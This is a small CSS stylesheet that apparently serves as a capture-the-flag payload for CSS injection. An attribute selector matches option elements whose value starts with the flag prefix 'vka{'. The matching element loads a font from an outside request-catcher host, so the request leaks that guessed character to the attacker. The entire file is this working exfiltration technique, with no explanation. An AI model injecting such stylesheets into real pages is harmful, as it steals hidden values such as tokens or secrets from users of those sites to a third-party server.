@charset "UTF-8";

@font-face {
    font-family: "flag-vka{";
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7B");
}
p:nth-of-type(4) option[value^="vka{"] {
    font-family: "flag-vka{";
}
